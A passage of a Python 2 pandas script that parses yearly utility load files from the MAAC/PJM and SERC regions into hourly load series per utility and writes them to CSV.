        1994 : _util_hours(maac94, 0, 'AE', 1),
        1995 : _util_hours(maac95, 1, 'AE', 2),
        1996 : _util_hours(maac96, 1, 'AE', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='ACE_LOAD').iloc[:, 1:25].values.ravel()
    },
    1167 : {  # BC
        1993 : _util_hours(maac93, 0, 'BC', 1),
        1994 : _util_hours(maac94, 0, 'BC', 1),
        1995 : _util_hours(maac95, 1, 'BC', 2),
        1996 : _util_hours(maac96, 1, 'BC', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='BC_LOAD').iloc[:, 1:25].values.ravel()
    },
    5027 : {  # DPL
        1993 : _util_hours(maac93, 0, 'DP', 1),
        1994 : _util_hours(maac94, 0, 'DP', 1),
        1995 : _util_hours(maac95, 1, 'DP', 2),
        1996 : _util_hours(maac96, 1, 'DP', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='DPL_LOAD').iloc[:366, 1:25].values.ravel()
    },
    7088 : {  # PU (GPU)
        1993 : _util_hours(maac93, 0, 'PU', 1),
        1994 : _util_hours(maac94, 0, 'PU', 1),
        1995 : _util_hours(maac95, 1, 'PU', 2),
        1996 : _util_hours(maac96, 1, 'PU', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='GPU_LOAD').iloc[:366, 1:25].values.ravel()
    },
    14715 : {  # PN -- only broken out in the 1997 workbook
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PN_LOAD').iloc[:366, 1:25].values.ravel()
    },
    14940 : {  # PE
        1993 : _util_hours(maac93, 0, 'PE$', 1),
        1994 : _util_hours(maac94, 0, 'PE$', 1),
        1995 : _util_hours(maac95, 1, 'PE$', 2),
        1996 : _util_hours(maac96, 1, 'PE$', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PE_Load').iloc[:366, 1:25].values.ravel()
    },
    15270 : {  # PEP
        1993 : _util_hours(maac93, 0, 'PEP', 1),
        1994 : _util_hours(maac94, 0, 'PEP', 1),
        1995 : _util_hours(maac95, 1, 'PEP', 2),
        1996 : _util_hours(maac96, 1, 'PEP', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PEP_LOAD').iloc[:366, 1:25].values.ravel()
    },
    15477 : {  # PS
        1993 : _util_hours(maac93, 0, 'PS', 1),
        1994 : _util_hours(maac94, 0, 'PS', 1),
        1995 : _util_hours(maac95, 1, 'PS', 2),
        1996 : _util_hours(maac96, 1, 'PS', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PS_Load').iloc[:366, 1:25].values.ravel()
    },
    14725 : {  # PJM pool total
        1993 : _util_hours(maac93, 0, 'PJM', 1),
        1994 : _util_hours(maac94, 0, 'PJM', 1),
        1995 : _util_hours(maac95, 1, 'PJM', 2),
        1996 : _util_hours(maac96, 1, 'PJM', 2),
        1997 : pd.read_excel('%s/maac/1997/PJM97' % (fulldir), sheetname='PJM_LOAD').iloc[:366, 1:25].values.ravel(),
        1998 : pd.read_csv('%s/maac/1998/PJM98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
        1999 : pd.read_excel('%s/maac/1999/PJM99' % (fulldir), header=None)[2].values,
        2000 : pd.read_excel('%s/maac/2000/PJM00' % (fulldir), header=None)[2].values
    }
}
if not os.path.exists('./maac'):
os.mkdir('maac')
for k in maac.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(maac[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(maac[k][i]))) for i in maac[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./maac/%s.csv' % k)
###### SERC
# AEC: 189
# CPL: 3046
# CEPC: 40218
# CEPB: 3408
# MEMP: 12293
# DUKE: 5416
# FPWC: 6235 *
# FLINT: 6411
# GUC: 7639
# LCEC: 10857
# NPL: 13204
# OPC: 13994
# SCEG: 17539
# SCPS: 17543
# SMEA: 17568
# TVA: 18642
# VIEP: 19876
# WEMC: 20065
# DU: 4958
# AECI: 924
# ODEC-D: 402290
# ODEC-V: 402291
# ODEC: 40229
# SOCO-APCO: 195
# SOCO-GPCO: 7140
# SOCO-GUCO: 7801
# SOCO-MPCO: 12686
# SOCO-SECO: 16687 *?
serc = {
189 : {
1993 : pd.read_csv('%s/serc/1993/AEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/AEC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/serc/1995/AEC95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/serc/1996/AEC96' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/serc/1997/AEC97' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/serc/1998/AEC98' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/serc/1999/AEC99' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=3).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/serc/2000/AEC00' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2001 : pd.read_csv('%s/serc/2001/AEC01' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=5).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/serc/2002/AEC02' % (fulldir), sep='\t', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/serc/2004/AEC04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4).iloc[:, 1:].values.ravel()
},
3046 : {
1994 : pd.read_csv('%s/serc/1994/CPL94' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/serc/1995/CPL95' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=5)[1].values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPL96' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/CPL97' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/CPL98' % (fulldir)).readlines()[1:]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/CPL99' % (fulldir)).readlines()[1:]])[2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/CPL00' % (fulldir))['Load'].values,
2001 : pd.read_excel('%s/serc/2001/CPL01' % (fulldir))['Load'].values,
2002 : pd.read_excel('%s/serc/2002/CPL02' % (fulldir))['Load'].values,
2003 : pd.read_excel('%s/serc/2003/CPL03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/serc/2004/CPL04' % (fulldir))['Load'].values
},
40218 : {
1993 : pd.read_fwf('%s/serc/1993/CEPC93' % (fulldir), header=None).iloc[:, 1:-1].values.ravel(),
1994 : pd.read_csv('%s/serc/1994/CEPC94' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=1).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_csv('%s/serc/1995/CEPC95' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].replace('.', '0').astype(float).values.ravel(),
1996 : (pd.read_fwf('%s/serc/1996/CEPC96' % (fulldir)).iloc[:-1, 1:]/1000).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPC97' % (fulldir)).readlines()[5:]]).iloc[:-1, 1:].astype(float)/1000).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPC98' % (fulldir)).readlines()]).iloc[:, 1:].astype(float)).values.ravel(),
2000 : pd.read_excel('%s/serc/2000/CEPC00' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2001 : pd.read_excel('%s/serc/2001/CEPC01' % (fulldir), sheetname=1, skiprows=3)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values,
2002 : pd.read_excel('%s/serc/2002/CEPC02' % (fulldir), sheetname=0, skiprows=5)['MW'].values
},
3408 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/CEPB93' % (fulldir)).readlines()[12:]])[1].astype(float)/1000).values,
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/CEPB94' % (fulldir)).readlines()[10:]])[1].astype(float)).values,
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/CEPB95' % (fulldir)).readlines()[6:]])[2].astype(float)).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/CEPB96' % (fulldir)).readlines()[10:]])[2].astype(float)).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/CEPB97' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/CEPB98' % (fulldir)).readlines()[9:]])[2].astype(float)).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/CEPB99' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/CEPB00' % (fulldir)).readlines()[11:]])[2].astype(float)).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/CEPB01' % (fulldir)).readlines()[8:]])[2].astype(float)).values,
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/CEPB02' % (fulldir)).readlines()[6:]])[4].astype(float)).values,
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/CEPB03' % (fulldir)).readlines()[6:]])[2].astype(float)).values
},
12293 : {
2000 : (pd.read_csv('%s/serc/2000/MEMP00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/MEMP01' % (fulldir)).readlines()[1:]])[3].str.replace(',', '').astype(float)/1000).values,
2002 : (pd.read_csv('%s/serc/2002/MEMP02' % (fulldir), sep='\t').iloc[:, -1].str.replace(',', '').astype(float)/1000).values,
2003 : pd.read_csv('%s/serc/2003/MEMP03' % (fulldir)).iloc[:, -1].str.replace(',', '').astype(float).values
},
5416 : {
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/DUKE99' % (fulldir)).readlines()[4:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/DUKE00' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/DUKE01' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/DUKE02' % (fulldir)).readlines()[5:]])[2].astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/DUKE03' % (fulldir)).readlines()[5:-8]])[2].astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/DUKE04' % (fulldir)).readlines()[5:]])[2].astype(float).values
},
6411 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/FLINT93' % (fulldir)).readlines()])[6].astype(float)/1000).values,
1994 : ((pd.DataFrame([i.split() for i in open('%s/serc/1994/FLINT94' % (fulldir)).readlines()[:-1]])).iloc[:, -1].astype(float)/1000).values,
1995 : ((pd.DataFrame([i.split() for i in open('%s/serc/1995/FLINT95' % (fulldir)).readlines()[1:]]))[3].astype(float)/1000).values,
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/FLINT96' % (fulldir)).readlines()[3:-2]]))[2].astype(float).values,
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/FLINT97' % (fulldir)).readlines()[6:]]))[3].astype(float).values,
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/FLINT98' % (fulldir)).readlines()[4:]]))[2].astype(float).values,
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/FLINT99' % (fulldir)).readlines()[1:]]))[1].astype(float).values,
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/FLINT00' % (fulldir)).readlines()[2:]]))[4].astype(float).values
},
7639 : {
1993 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1993', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1994 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1994', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1995 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1995', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1996 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1996', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1997 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1997', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1998 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1998', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
1999 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='1999', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
2000 : np.concatenate([pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=7, header=None).iloc[:24, 1:183].values.ravel(order='F'), pd.read_excel('%s/serc/2000/GUC00' % (fulldir), sheetname='2000', skiprows=45, header=None).iloc[:24, 1:183].values.ravel(order='F')]).astype(float)/1000,
},
10857 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/LCEC93' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel(),
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/LCEC94' % (fulldir)).readlines()[:-1]]).iloc[:, 3:].astype(float).values.ravel()
},
13204 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/NPL93' % (fulldir)).readlines()[6:]])[2].astype(float).values,
1994 : pd.read_fwf('%s/serc/1994/NPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13994 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/OPC93' % (fulldir)).readlines()[4:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/OPC95' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/OPC96' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/OPC97' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/OPC98' % (fulldir)).readlines()[12:]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/OPC99' % (fulldir)).readlines()[18:]])[2].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/OPC00' % (fulldir)).readlines()[19:]])[2].astype(float).values
},
17539 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCEG93' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/serc/1995/SCEG95' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCEG96' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCEG97' % (fulldir)).readlines()[:-1]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCEG98' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCEG99' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCEG00' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCEG01' % (fulldir)).readlines()[:]]).iloc[:, -1].astype(float).values
},
17543 : {
1993 : pd.DataFrame([i.split() for i in open('%s/serc/1993/SCPS93' % (fulldir)).readlines()[:]]).iloc[:, 1:].astype(float).values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/serc/1996/SCPS96' % (fulldir)).readlines()[:-1]]).astype(float).values.ravel(),
1997 : pd.DataFrame([i.split() for i in open('%s/serc/1997/SCPS97' % (fulldir)).readlines()[1:-3]]).iloc[:, 4:-1].astype(float).values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SCPS98' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].replace('NA', '0').astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SCPS99' % (fulldir)).readlines()[1:-1]]).iloc[:, 2:-1].replace('NA', '0').astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SCPS00' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/SCPS01' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/serc/2002/SCPS02' % (fulldir), header=None).dropna(axis=1, how='all').iloc[:, 2:-1].values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SCPS03' % (fulldir)).readlines()[:]]).iloc[:, 2:].replace('NA', '0').astype(float).values.ravel(),
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/SCPS04' % (fulldir)).readlines()[1:]]).iloc[:, 1:-1].replace('NA', '0').astype(float).values.ravel()
},
17568 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/SMEA93' % (fulldir)).readlines()[5:]])[2].astype(float)/1000).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/SMEA94' % (fulldir)).readlines()[5:]]).iloc[:, -1].astype(float)).values,
1996 : ((pd.DataFrame([i.split() for i in open('%s/serc/1996/SMEA96' % (fulldir)).readlines()[:]])).iloc[:, -24:].astype(float)/1000).values.ravel(),
1997 : pd.read_excel('%s/serc/1997/SMEA97' % (fulldir), sheetname=1, header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1998 : pd.DataFrame([i.split() for i in open('%s/serc/1998/SMEA98' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/serc/1999/SMEA99' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/SMEA00' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel(),
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/SMEA02' % (fulldir)).readlines()[2:]])[2].astype(float).values.ravel(),
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/SMEA03' % (fulldir)).readlines()[1:]])[2].astype(float).values.ravel()
},
18642 : {
1993 : (pd.DataFrame([i.split() for i in open('%s/serc/1993/TVA93' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1994 : (pd.DataFrame([i.split() for i in open('%s/serc/1994/TVA94' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1995 : (pd.DataFrame([i.split() for i in open('%s/serc/1995/TVA95' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1996 : (pd.DataFrame([i.split() for i in open('%s/serc/1996/TVA96' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1997 : (pd.DataFrame([i.split() for i in open('%s/serc/1997/TVA97' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1998 : (pd.DataFrame([i.split() for i in open('%s/serc/1998/TVA98' % (fulldir)).readlines()[:-1]])[2].astype(float)).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/TVA99' % (fulldir)).iloc[:, 2].astype(float).values,
2000 : pd.read_excel('%s/serc/2000/TVA00' % (fulldir)).iloc[:, 2].astype(float).values,
2001 : pd.read_excel('%s/serc/2001/TVA01' % (fulldir), header=None, skiprows=3).iloc[:, 2].astype(float).values,
2003 : pd.read_excel('%s/serc/2003/TVA03' % (fulldir)).iloc[:, -1].values
},
19876 : {
1993 : pd.read_fwf('%s/serc/1993/VIEP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/serc/1994/VIEP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/serc/1995/VIEP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/serc/1996/VIEP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/serc/1997/VIEP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1998 : pd.read_fwf('%s/serc/1998/VIEP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/serc/1999/VIEP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/VIEP00' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2001 : (pd.DataFrame([i.split() for i in open('%s/serc/2001/VIEP01' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2002 : (pd.DataFrame([i.split() for i in open('%s/serc/2002/VIEP02' % (fulldir)).readlines()[1:]])[2].astype(float)).values.ravel(),
2003 : (pd.DataFrame([i.split() for i in open('%s/serc/2003/VIEP03' % (fulldir)).readlines()[2:]])[3].astype(float)).values.ravel(),
2004 : (pd.DataFrame([i.split() for i in open('%s/serc/2004/VIEP04' % (fulldir)).readlines()[:]])[3].astype(float)).values.ravel()
},
20065 : {
1993 : pd.read_fwf('%s/serc/1993/WEMC93' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1995 : (pd.read_csv('%s/serc/1995/WEMC95' % (fulldir), skiprows=1, header=None, sep=' ', skipinitialspace=True)[3]/1000).values,
1996 : (pd.read_excel('%s/serc/1996/WEMC96' % (fulldir))['Load']/1000).values,
1997 : pd.read_excel('%s/serc/1997/WEMC97' % (fulldir), skiprows=4)['MW'].values,
1998 : pd.concat([pd.read_excel('%s/serc/1998/WEMC98' % (fulldir), sheetname=i).iloc[:, -1] for i in range(12)]).values,
1999 : pd.read_excel('%s/serc/1999/WEMC99' % (fulldir))['mwh'].values,
2000 : (pd.read_excel('%s/serc/2000/WEMC00' % (fulldir)).iloc[:, -1]/1000).values,
2001 : (pd.read_excel('%s/serc/2001/WEMC01' % (fulldir), header=None)[0]/1000).values
},
4958 : {
1999 : (pd.DataFrame([i.split() for i in open('%s/serc/1999/DU99' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2000 : (pd.DataFrame([i.split() for i in open('%s/serc/2000/DU00' % (fulldir)).readlines()[1:]]).iloc[:-1, 2:].apply(lambda x: x.str.replace('[,"]', '').str.strip()).astype(float)/1000).values.ravel(),
2003 : pd.read_excel('%s/serc/2003/DU03' % (fulldir)).iloc[:, -1].values
},
924 : {
1999 : pd.read_excel('%s/serc/1999/AECI99' % (fulldir))['CALoad'].values,
2001 : pd.read_excel('%s/serc/2001/AECI01' % (fulldir)).iloc[:, -1].values,
2002 : pd.Series(pd.read_excel('%s/serc/2002/AECI02' % (fulldir), skiprows=3).loc[:, 'Jan':'Dec'].values.ravel(order='F')).dropna().values
},
402290 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECD96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECD97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECD98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECD99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECD00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECD01' % (fulldir)).readlines()[3:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECD02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECD03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECD04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
402291 : {
1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECV96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECV97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECV98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECV99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECV00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECV01' % (fulldir)).readlines()[3:]])[4].dropna().str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECV02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECV03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECV04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
195 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/APCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
